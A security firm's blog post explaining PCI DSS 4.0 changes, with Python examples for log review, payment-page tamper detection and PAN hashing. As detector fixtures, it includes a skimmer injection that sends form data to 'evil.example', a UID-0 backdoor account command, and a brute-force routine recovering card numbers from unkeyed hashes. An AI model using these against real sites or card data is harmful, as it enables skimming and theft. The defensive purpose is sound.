PCI DSS 4.0 Compliance Requirements: What Changed and What to Do
Posted to Cybersecurity.
Understanding PCI DSS 4.0: The Biggest Update in a Decade
The Payment Card Industry Data Security Standard (PCI DSS) version 4.0 is the most significant revision to the standard since its original release. Published by the PCI Security Standards Council on March 31, 2022, it formally replaced version 3.2.1 on March 31, 2024. Version 4.0 introduced 64 new requirements; 13 of them applied to every 4.0 assessment from the start, while the remaining 51 were treated as best practices until March 31, 2025, a deadline that has now passed. Organizations that process, store, or transmit cardholder data must comply with the full set of requirements.
This means that as of 2026, full compliance with PCI DSS 4.0 including all formerly future-dated requirements is mandatory. Organizations that have not yet transitioned face increased audit scrutiny, potential fines from payment brands, and greater liability in the event of a data breach.
At Petronella Technology Group, we have spent more than 23 years helping businesses in Raleigh, NC and throughout the United States navigate complex compliance requirements. This guide explains what changed in PCI DSS 4.0, what you need to do about it, and how to maintain compliance in an evolving threat landscape.
What Changed from PCI DSS 3.2.1 to 4.0
PCI DSS 4.0 introduces several fundamental shifts in approach while maintaining the familiar 12-requirement structure. The most significant changes include the introduction of the customized approach, expanded authentication requirements, targeted risk analysis, and a greater emphasis on continuous security rather than point-in-time compliance.
The Customized Approach: Perhaps the most transformative change, PCI DSS 4.0 introduces the customized approach as an alternative to the traditional defined approach. Each requirement now states a customized approach objective, and an organization may meet that objective with controls that differ from the requirement's specific text, provided it can demonstrate that the alternative controls achieve the objective. This gives mature organizations the flexibility to use newer security technology while still meeting the standard's intent. A few requirements are marked in the standard as not eligible for the customized approach, and the approach is only available in an assessment performed by a QSA or ISA; it cannot be used when validating with a Self-Assessment Questionnaire.
The customized approach is not a shortcut. It requires a controls matrix documenting each customized control, a targeted risk analysis for each one (Requirement 12.3.2), and validation by a Qualified Security Assessor (QSA), who must write assessment procedures specific to the control. Organizations pursuing this approach must demonstrate that their alternative controls provide at least equivalent security to the defined requirement.
Targeted Risk Analysis: PCI DSS 4.0 replaces the single annual enterprise risk assessment of 3.2.1 (old Requirement 12.2) with targeted risk analyses (Requirement 12.3.1). Wherever the standard lets the organization choose how often an activity is performed, a documented risk analysis must justify the chosen frequency. Examples include how often periodic malware scans run, how often logs from system components outside the critical set are reviewed, how often point-of-interaction devices are inspected for tampering, and how often passwords for system and application accounts are changed. This acknowledges that a one-size-fits-all frequency is inappropriate; a high-risk e-commerce environment may need daily review of every log source, while a low-risk environment with minimal cardholder data might justify a longer cadence for its non-critical systems. Each analysis must be reviewed at least once every 12 months.
Enhanced Authentication: Multi-factor authentication (MFA) requirements have been significantly expanded. Under PCI DSS 3.2.1, MFA was required only for non-console administrative access to the cardholder data environment (CDE) and for remote network access originating from outside the entity's network. Version 4.0 requires MFA for all access into the CDE (8.4.2), not just administrative or remote access, so an ordinary user on the corporate LAN reaching a CDE system needs it too. Requirement 8.5.1 also sets minimum properties for the MFA system itself: it must be resistant to replay attacks, cannot be bypassed by any user, including administrators, must use at least two different types of factors, and must not grant access until every factor succeeds.
Security as a Continuous Process: PCI DSS 4.0 emphasizes that compliance is not a once-a-year activity. New requirements mandate that organizations assign clear responsibility for meeting each requirement, document and implement security policies that are actively maintained, and ensure that personnel understand their security responsibilities through regular training and awareness programs.
The 12 Requirement Families
PCI DSS 4.0 retains the 12 high-level requirement families, organized under six control objectives. Understanding this structure helps organizations plan their compliance programs:
Build and Maintain a Secure Network and Systems: Requirement 1 addresses network security controls (previously "firewalls"), with updated language reflecting modern architectures including cloud and containerized environments. Requirement 2 covers secure configurations for all system components, including updated guidance for cloud-based and virtual systems.
Protect Account Data: Requirement 3 governs the protection of stored account data, with new limits on when disk-level encryption may stand alone (3.5.1.2), a requirement that any hash used to render PAN unreadable be keyed (3.5.1.1), and expanded key management provisions. Requirement 4 addresses strong cryptography for cardholder data transmitted over open, public networks, including an inventory of the trusted keys and certificates used to protect PAN in transit (4.2.1.1) and confirmation that those certificates are valid and neither expired nor revoked.
Maintain a Vulnerability Management Program: Requirement 5 covers malware protection with expanded scope: system components that are not at risk from malware must be periodically re-evaluated to confirm they remain so (5.2.3) instead of being excluded outright. Requirement 6 addresses secure software development and maintenance, with significant new requirements for web application security, including an automated technical solution, such as a web application firewall (WAF), that continually detects and prevents web-based attacks against public-facing web applications (6.4.2). Under 3.2.1 a periodic manual vulnerability review was an acceptable alternative; under 4.0 it no longer is.
Implement Strong Access Control Measures: Requirement 7 restricts access to cardholder data by business need to know. Requirement 8 addresses user identification and authentication, including the expanded MFA requirements and a minimum password length of 12 characters (8 where the system cannot support 12), up from 7 in 3.2.1. Requirement 9 covers physical access to cardholder data and systems.
Regularly Monitor and Test Networks: Requirement 10 addresses logging and monitoring with new requirements for automated log review mechanisms. Requirement 11 covers security testing, including new mandates for authenticated internal vulnerability scanning and updated penetration testing guidance.
Maintain an Information Security Policy: Requirement 12 encompasses organizational security policies, personnel training, incident response, and the overall security program. New provisions require organizations to perform targeted risk analyses (12.3.1), document and confirm their PCI DSS scope at least once every 12 months (12.5.2; every six months for service providers under 12.5.2.1), and implement a security awareness program that specifically addresses phishing and social engineering (12.6.3.1).
Key New Requirements That Demand Immediate Attention
Several specific new requirements deserve particular attention because they represent significant operational changes for most organizations:
Automated Log Review (10.4.1.1): Organizations must now implement automated mechanisms to perform audit log reviews. Manual log reviews alone are no longer sufficient. This typically requires a Security Information and Event Management (SIEM) solution or equivalent technology capable of correlating events and generating alerts for suspicious activity.
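As an added illustration of what "automated mechanisms" means in practice (this is example code written for this article, not a product or anything from the PCI SSC), the following Python reads a handful of constructed syslog-style lines and raises two kinds of alert that a manual daily skim would often miss: a burst of failed logins followed by a success from the same source, and a privileged account change made through sudo. Host names, user names, addresses, the log format, and the five-failures-in-ten-minutes threshold are all assumptions chosen for the demonstration.

```python
"""Added example: a minimal automated audit-log review that correlates
events across lines and raises alerts, in the spirit of PCI DSS 10.4.1.1.
The log format, hosts, users, addresses and thresholds are constructed
for this example and are not from the article or any real product."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (hypothetical hosts, users and addresses).
SAMPLE_LOG = """\
2026-01-12T02:14:01Z cde-db01 sshd: Failed password for admin from 203.0.113.7
2026-01-12T02:14:05Z cde-db01 sshd: Failed password for admin from 203.0.113.7
2026-01-12T02:14:09Z cde-db01 sshd: Failed password for admin from 203.0.113.7
2026-01-12T02:14:13Z cde-db01 sshd: Failed password for admin from 203.0.113.7
2026-01-12T02:14:18Z cde-db01 sshd: Failed password for admin from 203.0.113.7
2026-01-12T02:14:40Z cde-db01 sshd: Accepted password for admin from 203.0.113.7
2026-01-12T09:03:11Z cde-app02 sshd: Accepted publickey for deploy from 10.10.5.20
2026-01-12T09:03:30Z cde-app02 sudo: deploy : COMMAND=/usr/sbin/useradd -ou 0 svc_backup
2026-01-12T11:20:00Z cde-app02 sshd: Failed password for root from 198.51.100.9
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>\w+): (?P<msg>.*)$")
AUTH_RE = re.compile(r"^(?P<result>Failed|Accepted) \S+ for (?P<user>\S+) from (?P<src>\S+)$")
SUDO_RE = re.compile(r"^(?P<user>\S+) : COMMAND=(?P<cmd>.*)$")

FAIL_THRESHOLD = 5                 # failures before a later success is suspicious
FAIL_WINDOW = timedelta(minutes=10)


def parse(lines):
    """Turn raw lines into event dicts with a real timestamp; skip junk lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue   # production tooling should count unparseable lines too
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def review_logs(lines):
    """Return a list of alert dicts, each with a rule name and context."""
    alerts = []
    failures = defaultdict(list)   # (host, user, src) -> timestamps of failures
    for ev in parse(lines):
        if ev["proc"] == "sshd":
            a = AUTH_RE.match(ev["msg"])
            if not a:
                continue
            key = (ev["host"], a["user"], a["src"])
            if a["result"] == "Failed":
                failures[key].append(ev["ts"])
                continue
            # A success: correlate it with recent failures from the same source.
            recent = [t for t in failures[key] if ev["ts"] - t <= FAIL_WINDOW]
            if len(recent) >= FAIL_THRESHOLD:
                alerts.append({"rule": "brute_force_then_success",
                               "host": ev["host"], "user": a["user"],
                               "src": a["src"], "failures": len(recent)})
            failures[key].clear()
        elif ev["proc"] == "sudo":
            s = SUDO_RE.match(ev["msg"])
            if s and re.search(r"\buseradd\b|\busermod\b", s["cmd"]):
                alerts.append({"rule": "privileged_account_change",
                               "host": ev["host"], "user": s["user"],
                               "cmd": s["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in review_logs(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the sample, the review produces two alerts (the password-guessing success on cde-db01 and the UID-0 account creation on cde-app02) and stays silent on the single failed root login, which is noise on its own. A SIEM does the same correlation at scale and with persistence across days; the point of 10.4.1.1 is that the correlation happens without a person reading every line.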
Authenticated Vulnerability Scanning (11.3.1.2): Internal vulnerability scans must now be authenticated, giving the scanner credentials that let it see installed packages, local configuration, and missing patches that an unauthenticated network scan cannot. This means provisioning scanning credentials with sufficient privilege on every in-scope system and managing them securely: where a scan account can also be used for interactive login, it is subject to the account and password controls in Requirement 8, and systems that cannot accept credentials must be documented.
Detection of Payment Page Tampering (6.4.3 and 11.6.1): Organizations with web-based payment pages must control the scripts those pages load and detect unauthorized changes to them. Requirement 6.4.3 requires an inventory of every script on the payment page with a written justification, a method to confirm each script is authorized, and a method to assure its integrity. Requirement 11.6.1 requires a change- and tamper-detection mechanism that alerts on unauthorized modification of the HTTP headers and the page contents as received by the consumer browser, evaluated at least once every seven days or at a frequency set by targeted risk analysis. Both address attacks in which threat actors inject malicious JavaScript (web skimming or Magecart attacks) to capture cardholder data as it is entered. Content Security Policy (CSP) and Subresource Integrity (SRI) are the natural browser-side controls for 6.4.3. For 11.6.1, file integrity monitoring on the web server is not enough on its own, because it does not see what the browser actually received; most organizations add an out-of-band monitor that fetches the live page and compares its scripts and headers against a known-good baseline.
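The following is an added example written for this article (not code from Petronella Technology Group, the PCI SSC, or any vendor) of the server-side half of those two requirements: it keeps an authorized script inventory with expected SRI hashes, parses a payment page as delivered, and reports inline scripts, scripts not in the inventory, missing or mismatched integrity attributes, script bodies that drifted on the CDN, and any change to the page against a baseline hash. The page HTML, script URLs and bodies, and the inventory layout are all constructed; a real deployment would fetch the live page and scripts from the public internet rather than use embedded strings.

```python
"""Added example: a server-side payment page check in the spirit of PCI DSS
6.4.3 (script inventory, authorization and integrity) and 11.6.1 (change and
tamper detection). The page HTML, script URLs, script bodies and inventory
format are all constructed for this example and are not from the article."""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes) -> str:
    """Return an SRI value in the form browsers accept: 'sha384-<base64>'."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


# Constructed inventory: every script the payment page may load, with a
# written justification and the expected SRI hash of its content.
CHECKOUT_JS = b"function tokenize(f){/* hypothetical tokenizer */}"
ANALYTICS_JS = b"window.track=function(){};"
INVENTORY = {
    "https://pay.example/js/checkout.js": {
        "purpose": "card tokenization", "integrity": sri_hash(CHECKOUT_JS)},
    "https://cdn.example/analytics.js": {
        "purpose": "page analytics", "integrity": sri_hash(ANALYTICS_JS)},
}


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> tag in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))


def check_payment_page(html, inventory, baseline_sha256=None, served=None):
    """Return a list of (finding, detail) tuples; an empty list means no deviation.

    html            - page content as delivered to the browser
    inventory       - authorized scripts (6.4.3), keyed by src
    baseline_sha256 - known-good hash of the page from the last review (11.6.1)
    served          - optional {src: bytes} of script bodies fetched out of band,
                      to catch a script whose content changed on the CDN
    """
    findings = []
    parser = ScriptCollector()
    parser.feed(html)
    for attrs in parser.scripts:
        src = attrs.get("src")
        if src is None:
            findings.append(("inline_script", "inline script on payment page"))
            continue
        entry = inventory.get(src)
        if entry is None:
            findings.append(("unauthorized_script", src))
            continue
        if "integrity" not in attrs:
            findings.append(("missing_integrity", src))
        elif attrs["integrity"] != entry["integrity"]:
            findings.append(("integrity_mismatch", src))
        if served and src in served and sri_hash(served[src]) != entry["integrity"]:
            findings.append(("content_drift", src))
    page_hash = hashlib.sha256(html.encode()).hexdigest()
    if baseline_sha256 is not None and page_hash != baseline_sha256:
        findings.append(("page_changed", page_hash))
    return findings


CK_SRI = INVENTORY["https://pay.example/js/checkout.js"]["integrity"]
AN_SRI = INVENTORY["https://cdn.example/analytics.js"]["integrity"]

# Constructed known-good page and its baseline hash.
GOOD_PAGE = (
    '<html><body><form id="card"><input name="pan"></form>\n'
    f'<script src="https://pay.example/js/checkout.js" integrity="{CK_SRI}" crossorigin="anonymous"></script>\n'
    f'<script src="https://cdn.example/analytics.js" integrity="{AN_SRI}" crossorigin="anonymous"></script>\n'
    "</body></html>"
)
BASELINE = hashlib.sha256(GOOD_PAGE.encode()).hexdigest()

# Constructed tampered page: SRI stripped from analytics.js, a skimmer loaded
# from a third-party host, and an inline hook on the form, the pattern a
# Magecart-style injection follows.
TAMPERED_PAGE = GOOD_PAGE.replace(f' integrity="{AN_SRI}"', "").replace(
    "</body>",
    '<script src="https://evil.example/s.js"></script>'
    '<script>document.forms[0].onsubmit=function(){fetch("https://evil.example/c")}</script>'
    "</body>",
)

if __name__ == "__main__":
    print("known-good page:", check_payment_page(GOOD_PAGE, INVENTORY, BASELINE))
    for finding in check_payment_page(TAMPERED_PAGE, INVENTORY, BASELINE):
        print("ALERT", *finding)
```

The check is deliberately strict about inline scripts: a payment page with no inline code gives a CSP of `script-src` plus a short allow-list a chance to actually block an injection, and every inline block is one more thing the inventory has to justify. The `served` argument is what turns this from a static review into the periodic 11.6.1 monitor: fetching each authorized script from the CDN and re-hashing it catches a supply-chain change that the page's own SRI attribute would only reveal as a broken checkout.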
Limits on Disk-Level Encryption (3.5.1.2): Requirement 3.5.1 lists the acceptable ways to render stored PAN unreadable: a one-way hash, which under 3.5.1.1 must now be a keyed cryptographic hash rather than a plain hash; truncation; index tokens; or strong cryptography with proper key management. Under 3.5.1.2, disk-level or partition-level encryption counts on its own only for removable electronic media (which should be avoided where possible); on non-removable storage it may still be used, but PAN must also be rendered unreadable by one of the other 3.5.1 methods. Whole-disk encryption on a database server therefore does not by itself satisfy Requirement 3.
Roles and Responsibilities Documentation: Requirements 1 through 11 each now open with a sub-requirement (numbered x.1.2) to document, assign, and communicate roles and responsibilities for the activities in that requirement, and Requirement 12 carries the same expectation in 12.1.3. This is a significant documentation effort that many organizations underestimate.
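To make the Requirement 3 distinctions concrete, here is an added example (written for this article; not code from Petronella Technology Group or the PCI SSC) that goes one step beyond the paragraph: it implements truncation, display masking and an HMAC-based keyed hash, and then plays the attacker to show why 4.0 requires the hash to be keyed. When a truncated PAN (first six and last four digits) and an unkeyed hash of the same card sit in the same environment, only the six middle digits are unknown, so the full PAN falls to a million-guess loop in seconds; the same search against the keyed hash finds nothing without the key. The PAN and key are constructed test values, and the 16-digit length, truncation format and HMAC-SHA256 choice are assumptions of the example.

```python
"""Added example: the ways PCI DSS 3.5.1 lets stored PAN be rendered
unreadable (truncation, keyed hash, masking for display), plus a
demonstration of why 4.0's 3.5.1.1 insists the hash be keyed. The PAN and
key are constructed test values; the attack enumerates only the digits that
truncation leaves unknown."""
import hashlib
import hmac
import secrets


def luhn_valid(pan: str) -> bool:
    """Luhn check-digit validation used on card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def truncate(pan: str) -> str:
    """A permitted truncation format: first six and last four digits only."""
    return pan[:6] + pan[-4:]


def mask_for_display(pan: str) -> str:
    """Masking for display (Requirement 3.4.1): first six and last four visible."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def unkeyed_hash(pan: str) -> str:
    """What 3.2.1 accepted and 4.0 no longer does: a plain one-way hash."""
    return hashlib.sha256(pan.encode()).hexdigest()


def keyed_hash(pan: str, key: bytes) -> str:
    """A keyed cryptographic hash (HMAC-SHA256) as 3.5.1.1 requires."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def recover_from_truncated(truncated: str, target_hash: str, pan_len: int = 16):
    """Attacker's view: the truncated PAN and a hash of the full PAN are both
    available (common in reports and databases). Only pan_len - 10 digits are
    unknown, so every candidate can be tried in seconds. Returns the PAN if
    the hash was unkeyed SHA-256, None otherwise (no key, no match)."""
    first, last = truncated[:6], truncated[6:]
    missing = pan_len - 10
    for n in range(10 ** missing):
        candidate = f"{first}{n:0{missing}d}{last}"
        if unkeyed_hash(candidate) == target_hash:
            return candidate
    return None


if __name__ == "__main__":
    pan = "4111111111111111"          # constructed test PAN
    key = secrets.token_bytes(32)     # in practice: managed per Requirements 3.6 and 3.7
    assert luhn_valid(pan)
    print("stored truncated :", truncate(pan))
    print("displayed masked :", mask_for_display(pan))
    print("unkeyed hash lets an attacker recover:",
          recover_from_truncated(truncate(pan), unkeyed_hash(pan)))
    print("keyed hash search result:",
          recover_from_truncated(truncate(pan), keyed_hash(pan, key)))
```

The keyed hash moves the problem from "enumerate a million digits" to "obtain the key", which is exactly why the key then has to be protected under the key-management requirements rather than stored next to the hashes. The same reasoning applies to the long-standing note that hashed and truncated versions of a PAN must not be correlatable in the same environment.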
Compliance Levels and SAQ Types
PCI DSS compliance requirements vary based on the volume of transactions your organization processes annually. The payment brands (Visa, Mastercard, American Express, and Discover) define four merchant levels:
Level 1: More than 6 million transactions annually. Requires an annual Report on Compliance (ROC) by a QSA and quarterly network scans by an Approved Scanning Vendor (ASV).
Level 2: 1 million to 6 million transactions annually. Requires an annual Self-Assessment Questionnaire (SAQ) and quarterly ASV scans. Some acquiring banks may require a QSA assessment.
Level 3: 20,000 to 1 million e-commerce transactions annually. Requires an annual SAQ and quarterly ASV scans.
Level 4: Fewer than 20,000 e-commerce transactions or up to 1 million total transactions annually. Requires an annual SAQ and quarterly ASV scans, though requirements are determined by the acquiring bank.
The SAQ type you complete depends on how you process payments. SAQ A is for card-not-present merchants that fully outsource all cardholder data functions to validated third parties, including e-commerce sites that hand the payment step to a provider by redirect or iframe. SAQ A-EP applies to e-commerce merchants that partially outsource payment processing but whose websites could affect the security of the payment transaction, for example by serving the page that embeds the provider's JavaScript form or by using a direct-post method. SAQ B covers merchants using only imprint machines or standalone dial-out terminals with no electronic cardholder data storage, and SAQ B-IP covers standalone PTS-approved terminals with an IP connection. SAQ C-VT is for merchants that key transactions one at a time into a web-based virtual terminal, and SAQ C applies to merchants with payment application systems connected to the internet and no electronic storage. SAQ P2PE is for merchants using a validated point-to-point encryption solution. SAQ D is the comprehensive questionnaire for merchants (and, in its service provider form, for service providers) that do not qualify for any other SAQ type; it covers all PCI DSS requirements.
Timeline and Key Dates
The PCI DSS 4.0 transition timeline has several important milestones that organizations must be aware of:
PCI DSS 3.2.1 was formally retired on March 31, 2024, and all assessments started after that date must use version 4.x. Version 4.0.1, a limited revision published in June 2024 to correct errors and clarify wording, is now the version assessments are performed against; it added no requirements and moved no deadlines. The future-dated requirements, which were best practices until March 31, 2025, are now fully mandatory. This includes requirements for targeted risk analysis, enhanced authentication, automated log review, authenticated scanning, and payment page tampering detection.
Organizations that have not yet implemented the formerly future-dated requirements are out of compliance and should take immediate action to close these gaps.
Building a PCI DSS 4.0 Compliance Program
Achieving and maintaining PCI DSS 4.0 compliance requires a systematic approach. Start with a gap assessment that compares your current controls against the 4.0 requirements, paying particular attention to the new and changed requirements. Prioritize remediation of gaps based on risk, focusing first on controls that directly protect cardholder data and those that address the most likely attack vectors.
Document everything. PCI DSS 4.0 places greater emphasis on documentation than any previous version. Policies, procedures, roles and responsibilities, risk analyses, and evidence of control implementation must all be maintained and kept current. Many organizations find that their technical controls are adequate but their documentation lags behind.
Organizations managing compliance alongside other regulatory frameworks such as HIPAA or CMMC should look for opportunities to harmonize controls and documentation, reducing redundant effort while satisfying multiple compliance obligations.
How Petronella Technology Group Can Help
PCI DSS 4.0 compliance is not optional for any organization that processes payment cards, and the full weight of the standard's requirements is now in effect. Whether you are starting from scratch, transitioning from 3.2.1, or looking to maintain your existing compliance program, professional guidance can save time, reduce risk, and ensure your controls actually protect your cardholder data rather than just checking boxes.
Petronella Technology Group brings more than 23 years of IT security and compliance experience to every engagement. Our managed IT services include ongoing compliance monitoring and support, ensuring your PCI DSS program remains effective as the standard evolves and your business grows.
Contact Petronella Technology Group to discuss your PCI DSS 4.0 compliance requirements and learn how we can help you protect your customers' payment data.